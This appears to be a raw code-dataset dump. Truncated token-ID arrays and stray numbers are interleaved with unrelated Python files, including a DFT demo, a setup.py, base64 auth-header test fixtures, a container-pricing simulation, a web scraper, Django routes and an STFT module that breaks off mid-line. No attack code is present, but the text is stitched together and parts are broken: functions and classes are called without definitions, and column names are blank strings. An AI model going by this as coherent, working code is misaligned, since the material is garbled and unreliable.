[ 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 25064, 198, 198, 17597, 13, 6978, 13, 33295, 10786, 40720, 40720, 40720, 43776, 14, 27530, 14, 11537, 198, 11748, 288, 701, 17633, ...
1.929078
423
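# The demo above depends on the sms-tools dftModel module; a plain-numpy
# approximation of what dftAnal returns for a rectangular window (assuming
# zero-phase windowing via fftshift, as that toolkit does):
import numpy as np

N, k0 = 64, 8.5
x = np.cos(2 * np.pi * k0 / N * np.arange(-N / 2, N / 2))
X = np.fft.fft(np.fft.fftshift(x))[:N // 2 + 1]       # positive half only
mX = 20 * np.log10(np.abs(X) + np.finfo(float).eps)   # magnitude in dB
pX = np.unwrap(np.angle(X))                            # unwrapped phase
print(mX.shape, pX.shape)  # (33,) (33,)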
# setup.py as described in: # https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable # to install on your system, run: # > pip install -e . from setuptools import setup, find_packages setup( name='typobs', version='0.0.3', entry_points={ 'console_scripts': [ 'to_obsidian=to_obsidian:run', 'to_typora=to_typora:run', ] }, packages=find_packages(), # metadata to display on PyPI author="Jerzy Dziewierz", author_email="jurek_pypi@dziewierz.pl", description="Convert between Typora and Obsidian link styles", keywords="Typora Obsidian Markdown link converter", url="https://github.com/jerzydziewierz/typobs", # project home page, if any project_urls={ "Bug Tracker": "https://github.com/jerzydziewierz/typobs", "Documentation": "https://github.com/jerzydziewierz/typobs", "Source Code": "https://github.com/jerzydziewierz/typobs", }, classifiers=[ "Programming Language :: Python", "Topic :: Documentation", "Topic :: Software Development :: Documentation", "Topic :: Office/Business", "Topic :: Text Processing :: Filters", "Topic :: Text Processing :: Markup", "Development Status :: 5 - Production/Stable", "Environment :: Console", "License :: OSI Approved :: Apache Software License", ] )
[ 2, 9058, 13, 9078, 355, 3417, 287, 25, 198, 2, 3740, 1378, 25558, 2502, 11125, 13, 785, 14, 6138, 507, 14, 1983, 2920, 32576, 23, 14, 4919, 12, 4598, 12, 72, 12, 15883, 12, 64, 12, 29412, 12, 12048, 12, 18558, 18187, 198, 2, 284...
2.501761
568
""" decoded AUTH_HEADER (newlines added for readability): { "identity": { "account_number": "1234", "internal": { "org_id": "5678" }, "type": "User", "user": { "email": "test@example.com", "first_name": "Firstname", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Lastname", "locale": "en_US", "username": "test_username" } } "entitlements": { "smart_management": { "is_entitled": true } } } """ AUTH_HEADER = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1" "Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl" "bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz" "dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl" "Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf" "b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi" "TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz" "ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50" "aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50" "IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg==" } AUTH_HEADER_NO_ENTITLEMENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij" "EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl" "cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi" "J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6" "IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW" "1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt" "aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG" "9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn" "X2lkIjoiNTY3OCJ9fX0KCg==" } AUTH_HEADER_SMART_MGMT_FALSE = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi" "NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7" "ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp" "cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp" "c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi" "OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi" "dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl" "bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu" "dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg==" } # this can't happen in real life, adding test anyway AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf" "aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1" "c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv" "bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp" "c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0" "cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0" "X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu" "X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l" "In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu" "YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9" "fX0K" } """ decoded AUTH_HEADER_NO_ACCT (newlines added for readablity): { "identity": { "internal": { "org_id": "9999" }, "type": "User", "user": { "email": "nonumber@example.com", "first_name": "No", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Number", "locale": "en_US", "username": "nonumber" } } } """ AUTH_HEADER_NO_ACCT = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO" "nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm" "9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo" "iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX" "2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC" "JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo=" } BASELINE_ONE_LOAD = { "baseline_facts": [ {"name": "arch", "value": "x86_64"}, {"name": "phony.arch.fact", "value": "some value"}, ], "display_name": "arch baseline", } BASELINE_TWO_LOAD = { "baseline_facts": [ {"name": "memory", "value": "64GB"}, {"name": "cpu_sockets", "value": "16"}, ], "display_name": "cpu + mem baseline", } BASELINE_THREE_LOAD = { "baseline_facts": [ {"name": "nested", "values": 
[{"name": "cpu_sockets", "value": "16"}]} ], "display_name": "cpu + mem baseline", } BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]} BASELINE_PARTIAL_TWO = { "display_name": "ABCDE", "baseline_facts": [ { "name": "hello", "values": [ {"name": "nested_one", "value": "one"}, {"name": "nested_two", "value": "two"}, ], } ], } BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"} CREATE_FROM_INVENTORY = { "display_name": "created_from_inventory", "inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa", } SYSTEM_WITH_PROFILE = { "account": "9876543", "bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb", "created": "2018-01-31T13:00:00.100010Z", "display_name": None, "fqdn": None, "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", "insights_id": "00000000-28af-11e9-9ab0-c85b761454fa", "ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"], "mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"], "rhel_machine_id": None, "satellite_id": None, "subscription_manager_id": "RHN Classic and Red Hat Subscription Management", "system_profile": { "salutation": "hi", "system_profile_exists": False, "installed_packages": [ "openssl-1.1.1c-2.fc30.x86_64", "python2-libs-2.7.16-2.fc30.x86_64", ], "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", }, "tags": [], "updated": "2018-01-31T14:00:00.500000Z", }
[ 37811, 198, 12501, 9043, 37195, 62, 37682, 1137, 357, 3605, 6615, 2087, 329, 1100, 1799, 2599, 198, 90, 198, 220, 220, 220, 366, 738, 414, 1298, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 366, 23317, 62, 17618, 1298, 366, 1065, 2...
1.592225
3,627
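# The X-RH-IDENTITY value is just base64-encoded JSON, so a quick check
# (meant to run alongside the definitions above) confirms the decoded dict
# matches the commented block:
import base64
import json

identity = json.loads(base64.b64decode(AUTH_HEADER["X-RH-IDENTITY"]).decode("utf8"))
assert identity["identity"]["account_number"] == "1234"
assert identity["entitlements"]["smart_management"]["is_entitled"] is True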
#####Time Flow Simulation###### import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import timedelta import datetime import csv data=pd.read_excel('CF66-all.xlsx') data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True) or_data=pd.read_excel('CF66-ordinary.xlsx') rule=pd.read_excel('6. Existing pricing strategy.xlsx') or_name=or_data['WBL_NUM'].unique() data['ordinary']=0 for i in range(len(data)): if data.iloc[i,2] in or_name: data.iloc[i,9]=1 data['volume']=data['CNTR_TYPE'] for i in range(len(data)): data.iloc[i,10]=int(data.iloc[i,10][0:2]) raw_data=data.groupby('SVVD') data_to_list=list(raw_data) raw_list=[] for i in data_to_list: raw_list.append(i[1]) total_volume=raw_data['volume'].sum()*1.2 thisrule=rule.groupby(['','']).get_group(('','')) group_rule=thisrule.groupby(['','']) rule_to_list=list(group_rule) day_list=[] rule_list=[] for i in rule_to_list: day_list.append(i[0]) rule_list.append(i[1]) m=datetime.timedelta(days=14) newlist=[] for i in raw_list: i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT']) m=datetime.timedelta(days=14) j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m] newlist.append(j) del(raw_list) for i in newlist: i['acc_volume']=i['volume'].cumsum() i['total_volume']=i['volume'].sum()*1.2 m=datetime.timedelta(days=14) i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days i['acc_rate']=i['acc_volume']/i['total_volume']*100 i['new_AMT']=i['AMT'] for k in range(len(newlist)): acc_20gp=0 acc_40gp=0 acc_40hq=0 print('k='+str(k)) for i in range(len(day_list)): print('i='+str(i)) first_day=day_list[i][0] last_day=day_list[i][1] flag=[0]*len(rule_list[i]) for j in range(len(newlist[k])): if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1: for z in range(len(rule_list[i])): print('z='+str(z)) if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='': if flag[z]==0: flag[z]=1 acc_20gp+=rule_list[i].iloc[z]['20GP'] acc_40gp+=rule_list[i].iloc[z]['40GP'] acc_40hq+=rule_list[i].iloc[z]['40HQ'] if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='': if flag[z]==0: flag[z]=1 acc_20gp-=rule_list[i].iloc[z]['20GP'] acc_40gp-=rule_list[i].iloc[z]['40GP'] acc_40hq-=rule_list[i].iloc[z]['40HQ'] print(flag) print(acc_20gp) print(acc_40gp) print(acc_40hq) if newlist[k].iloc[j]['CNTR_TYPE']=='20GP': newlist[k].iloc[j,15]+=acc_20gp if newlist[k].iloc[j]['CNTR_TYPE']=='40GP': newlist[k].iloc[j,15]+=acc_40gp if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ': newlist[k].iloc[j,15]+=acc_40hq for i in newlist: print('revenue:'+str(i['AMT'].sum())) print('newrevenue:'+str(i['new_AMT'].sum())) newlist[0].to_csv('voyage1.csv') newlist[1].to_csv('voyage2.csv') newlist[2].to_csv('voyage3.csv')
[ 4242, 2, 7575, 27782, 41798, 4242, 2235, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 11748, 19798, 292, 355, 279, 67, 201, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 201, 198, 6738, 4818, 8079, 1330, 28805, 1...
1.841399
1,715
import pytest import numpy as np from fanok.selection import adaptive_significance_threshold
[ 11748, 12972, 9288, 198, 198, 11748, 299, 32152, 355, 45941, 198, 198, 6738, 4336, 482, 13, 49283, 1330, 29605, 62, 12683, 811, 590, 62, 400, 10126, 628 ]
3.555556
27
#!/usr/bin/python

# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib

PORT_NUMBER = 8080


# Hypothetical stand-ins: the original request handler and run() are elided
# from this sample, so this minimal Python 2 sketch just answers every GET
# with an empty 200 to make the module runnable.
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()


def run():
    server = HTTPServer(('', PORT_NUMBER), Handler)
    server.serve_forever()


if __name__ == "__main__":
    run()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 198, 2, 15069, 13130, 12803, 24740, 198, 2, 220, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, ...
3.540426
235
from .main import Matrix
[ 6738, 764, 12417, 1330, 24936, 198 ]
4.166667
6
import os
import sys
import json
import datetime
import numpy as np

import glob
import skimage
from PIL import Image as pil_image
import cv2

dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)

locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
[ 628, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 33918, 198, 11748, 4818, 8079, 198, 11748, 299, 32152, 355, 45941, 198, 198, 11748, 15095, 198, 11748, 1341, 9060, 198, 6738, 350, 4146, 1330, 7412, 355, 5560, 62, 9060, 198, 1...
2.352941
204
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com'
with requests.get(url) as r:
    r.encoding='utf-8'
    # name the parser explicitly to avoid bs4's "no parser specified" warning
    soup = BeautifulSoup(r.text, 'html.parser')
    # pret = soup.prettify()
    u = soup.select('#u1 a')
    for i in u:
        print("%s,:%s" % (i.getText(),i.get('href')))
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 13838, 25, 16643, 3743, 13, 54, 648, 198, 11748, 7007, 198, 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, ...
2.240741
162
from django.urls import path, include from . import views urlpatterns = [ path("", views.newsView, name="home"), path("createBlog", views.CreateBlogView.as_view(), name="createBlog"), path("myBlogs", views.PostListView.as_view(), name="myBlogs"), path("single/<int:pk>", views.PostDetailView.as_view(), name="single"), path("subscribe", views.subscribeView,name="subscribe"), path("about", views.aboutView, name="about"), path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"), path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"), path("like/<int:pk>", views.LikeView, name="like_post"), # API urls for superuser path("api/create/", views.APICreateView.as_view()), path("api/posts/", views.APIListView.as_view()), path("api/posts/<int:pk>", views.APIDetailView.as_view()), ]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 11, 2291, 198, 6738, 764, 1330, 5009, 198, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 7203, 1600, 5009, 13, 10827, 7680, 11, 1438, 2625, 11195, 12340, 198, 220, 220, 220, ...
2.563422
339
#!/usr/bin/python
__author__ = "Matthew Zheng"
__purpose__ = "Sets up the unit class"
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 62, 9800, 62, 796, 366, 25372, 44583, 1, 198, 62, 29983, 62, 796, 366, 50, 1039, 510, 262, 4326, 1398, 1, 198 ]
2.733333
30
# -*- coding: utf-8 -*- """ Created on Wed Feb 26 22:23:07 2020 @author: Neal LONG Try to construct URL with string.format """ base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}" stock = "000002" api_type = 'cp' print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) stock = "00002" print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) print('='*40) print('{:>6}'.format('236')) print('{:>06}'.format('236')) print("Every {} should know the use of {}-{} programming and {}" .format("programmer", "Open", "Source", "Operating Systems")) print("Every {3} should know the use of {2}-{1} programming and {0}" .format("programmer", "Open", "Source", "Operating Systems"))
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 37811, 201, 198, 41972, 319, 3300, 3158, 2608, 2534, 25, 1954, 25, 2998, 12131, 201, 198, 201, 198, 31, 9800, 25, 29189, 44533, 201, 198, 201, 198, 23433, 284, 56...
2.353846
390
from conans.server.launcher import ServerLauncher

from conans.util.env_reader import get_env

launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app


def main(*args):
    # assumed entry point: launch the blocking server loop
    launcher.launch()


if __name__ == "__main__":
    main()
[ 6738, 369, 504, 13, 15388, 13, 38722, 2044, 1330, 9652, 46182, 2044, 198, 198, 6738, 369, 504, 13, 22602, 13, 24330, 62, 46862, 1330, 651, 62, 24330, 198, 198, 38722, 2044, 796, 9652, 46182, 2044, 7, 15388, 62, 15908, 28, 1136, 62, ...
2.853659
82
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from azure.core.exceptions import HttpResponseError import msrest.serialization
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 16529, 35937, 198, 2, 15069, 357, 66, 8, 5413, 10501, 13, 1439, 2489, 10395, 13, 198, 2, 49962, 739, 262, 17168, 13789, 13, 4091, 13789, 13, 14116, 287, 262, 1628, 6808, 329, 5964, 1321, 13, 19...
4.233766
154
# # This module builds upon Cycles nodes work licensed as # Copyright 2011-2013 Blender Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import math import bpy import os import arm.assets import arm.utils import arm.make_state import arm.log import arm.material.mat_state as mat_state import arm.material.cycles_functions as c_functions import shutil emission_found = False particle_info = None # Particle info export ## ## ##
[ 2, 198, 2, 770, 8265, 12188, 2402, 5934, 5427, 13760, 670, 11971, 355, 198, 2, 15069, 2813, 12, 6390, 1086, 2194, 5693, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 3...
3.660156
256
import configparser
import numpy as np
import os


if __name__ == "__main__":
    config = Config(print_warnings=True)

    # Check if any added items miss templates
    for k in config.items:
        if not os.path.exists(f"./assets/items/{k}.png"):
            print(f"Template not found: {k}")

    # Check if any item templates miss a config
    for filename in os.listdir('assets/items'):
        filename = filename.lower()
        if filename.endswith('.png'):
            item_name = filename[:-4]
            blacklist_item = item_name.startswith("bl__")
            if item_name not in config.items and not blacklist_item:
                print(f"Config not found for: {filename}")
[ 11748, 4566, 48610, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 11748, 28686, 201, 198, 201, 198, 201, 198, 201, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 201, 198, 220, 220, 220, 4566, 796, 17056, 7, 4798, ...
2.298077
312
# Copyright 2019 Jian Wu # License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) import math import numpy as np import torch as th import torch.nn as nn import torch.nn.functional as tf import librosa.filters as filters from aps.const import EPSILON from typing import Optional, Union, Tuple def init_window(wnd: str, frame_len: int) -> th.Tensor: """ Return window coefficient Args: wnd: window name frame_len: length of the frame """ if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]: raise RuntimeError(f"Unknown window type: {wnd}") wnd_tpl = { "sqrthann": sqrthann, "hann": th.hann_window, "hamm": th.hamming_window, "blackman": th.blackman_window, "bartlett": th.bartlett_window, "rect": th.ones } if wnd != "rect": # match with librosa c = wnd_tpl[wnd](frame_len, periodic=True) else: c = wnd_tpl[wnd](frame_len) return c def init_kernel(frame_len: int, frame_hop: int, window: str, round_pow_of_two: bool = True, normalized: bool = False, inverse: bool = False, mode: str = "librosa") -> th.Tensor: """ Return STFT kernels Args: frame_len: length of the frame frame_hop: hop size between frames window: window name round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: return normalized DFT matrix inverse: return iDFT matrix mode: framing mode (librosa or kaldi) """ if mode not in ["librosa", "kaldi"]: raise ValueError(f"Unsupported mode: {mode}") # FFT points B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len # center padding window if needed if mode == "librosa" and B != frame_len: lpad = (B - frame_len) // 2 window = tf.pad(window, (lpad, B - frame_len - lpad)) if normalized: # make K^H * K = I S = B**0.5 else: S = 1 I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1) # W x B x 2 K = th.fft(I / S, 1) if mode == "kaldi": K = K[:frame_len] if inverse and not normalized: # to make K^H * K = I K = K / B # 2 x B x W K = th.transpose(K, 0, 2) * window # 2B x 1 x W K = th.reshape(K, (B * 2, 1, K.shape[-1])) return K, window def mel_filter(frame_len: int, round_pow_of_two: bool = True, num_bins: Optional[int] = None, sr: int = 16000, num_mels: int = 80, fmin: float = 0.0, fmax: Optional[float] = None, norm: bool = False) -> th.Tensor: """ Return mel filter coefficients Args: frame_len: length of the frame round_pow_of_two: if true, choose round(#power_of_two) as the FFT size num_bins: number of the frequency bins produced by STFT num_mels: number of the mel bands fmin: lowest frequency (in Hz) fmax: highest frequency (in Hz) norm: normalize the mel filter coefficients """ # FFT points if num_bins is None: N = 2**math.ceil( math.log2(frame_len)) if round_pow_of_two else frame_len else: N = (num_bins - 1) * 2 # fmin & fmax freq_upper = sr // 2 if fmax is None: fmax = freq_upper else: fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper) fmin = max(0, fmin) # mel filter coefficients mel = filters.mel(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm="slaney" if norm else None) # num_mels x (N // 2 + 1) return th.tensor(mel, dtype=th.float32) def speed_perturb_filter(src_sr: int, dst_sr: int, cutoff_ratio: float = 0.95, num_zeros: int = 64) -> th.Tensor: """ Return speed perturb filters, reference: https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py Args: src_sr: sample rate of the source signal dst_sr: sample rate of the target signal Return: weight (Tensor): coefficients of the filter """ if src_sr == dst_sr: raise ValueError( f"src_sr should not be equal to dst_sr: 
{src_sr}/{dst_sr}") gcd = math.gcd(src_sr, dst_sr) src_sr = src_sr // gcd dst_sr = dst_sr // gcd if src_sr == 1 or dst_sr == 1: raise ValueError("do not support integer downsample/upsample") zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio padding = 1 + int(num_zeros / zeros_per_block) # dst_sr x src_sr x K times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) - np.arange(src_sr)[None, :, None] / float(src_sr) - np.arange(2 * padding + 1)[None, None, :] + padding) window = np.heaviside(1 - np.abs(times / padding), 0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi)) weight = np.sinc( times * zeros_per_block) * window * zeros_per_block / float(src_sr) return th.tensor(weight, dtype=th.float32) def splice_feature(feats: th.Tensor, lctx: int = 1, rctx: int = 1, subsampling_factor: int = 1, op: str = "cat") -> th.Tensor: """ Splice feature Args: feats (Tensor): N x ... x T x F, original feature lctx: left context rctx: right context subsampling_factor: subsampling factor op: operator on feature context Return: splice (Tensor): feature with context padded """ if lctx + rctx == 0: return feats if op not in ["cat", "stack"]: raise ValueError(f"Unknown op for feature splicing: {op}") # [N x ... x T x F, ...] ctx = [] T = feats.shape[-2] T = T - T % subsampling_factor for c in range(-lctx, rctx + 1): idx = th.arange(c, c + T, device=feats.device, dtype=th.int64) idx = th.clamp(idx, min=0, max=T - 1) ctx.append(th.index_select(feats, -2, idx)) if op == "cat": # N x ... x T x FD splice = th.cat(ctx, -1) else: # N x ... x T x F x D splice = th.stack(ctx, -1) return splice def _forward_stft( wav: th.Tensor, kernel: th.Tensor, output: str = "polar", pre_emphasis: float = 0, frame_hop: int = 256, onesided: bool = False, center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT inner function Args: wav (Tensor), N x (C) x S kernel (Tensor), STFT transform kernels, from init_kernel(...) 
output (str), output format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples pre_emphasis: factor of preemphasis onesided: return half FFT bins center: if true, we assumed to have centered frames Return: transform (Tensor or [Tensor, Tensor]), STFT transform results """ wav_dim = wav.dim() if output not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {output}") if wav_dim not in [2, 3]: raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D") # if N x S, reshape N x 1 x S # else: reshape NC x 1 x S N, S = wav.shape[0], wav.shape[-1] wav = wav.view(-1, 1, S) # NC x 1 x S+2P if center: pad = kernel.shape[-1] // 2 # NOTE: match with librosa wav = tf.pad(wav, (pad, pad), mode="reflect") # STFT if pre_emphasis > 0: # NC x W x T frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0) frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1] # 1 x 2B x W, NC x W x T, NC x 2B x T packed = th.matmul(kernel[:, 0][None, ...], frames) else: packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0) # NC x 2B x T => N x C x 2B x T if wav_dim == 3: packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1]) # N x (C) x B x T real, imag = th.chunk(packed, 2, dim=-2) # N x (C) x B/2+1 x T if onesided: num_bins = kernel.shape[0] // 4 + 1 real = real[..., :num_bins, :] imag = imag[..., :num_bins, :] if output == "complex": return (real, imag) elif output == "real": return th.stack([real, imag], dim=-1) else: mag = (real**2 + imag**2 + EPSILON)**0.5 pha = th.atan2(imag, real) return (mag, pha) def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], kernel: th.Tensor, window: th.Tensor, input: str = "polar", frame_hop: int = 256, onesided: bool = False, center: bool = False) -> th.Tensor: """ iSTFT inner function Args: transform (Tensor or [Tensor, Tensor]), STFT transform results kernel (Tensor), STFT transform kernels, from init_kernel(...) 
input (str), input format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples onesided: return half FFT bins center: used in _forward_stft Return: wav (Tensor), N x S """ if input not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {input}") if input == "real": real, imag = transform[..., 0], transform[..., 1] elif input == "polar": real = transform[0] * th.cos(transform[1]) imag = transform[0] * th.sin(transform[1]) else: real, imag = transform # (N) x F x T imag_dim = imag.dim() if imag_dim not in [2, 3]: raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D") # if F x T, reshape 1 x F x T if imag_dim == 2: real = th.unsqueeze(real, 0) imag = th.unsqueeze(imag, 0) if onesided: # [self.num_bins - 2, ..., 1] reverse = range(kernel.shape[0] // 4 - 1, 0, -1) # extend matrix: N x B x T real = th.cat([real, real[:, reverse]], 1) imag = th.cat([imag, -imag[:, reverse]], 1) # pack: N x 2B x T packed = th.cat([real, imag], dim=1) # N x 1 x T s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0) # normalized audio samples # refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171 # 1 x W x T win = th.repeat_interleave(window[None, ..., None], packed.shape[-1], dim=-1) # W x 1 x 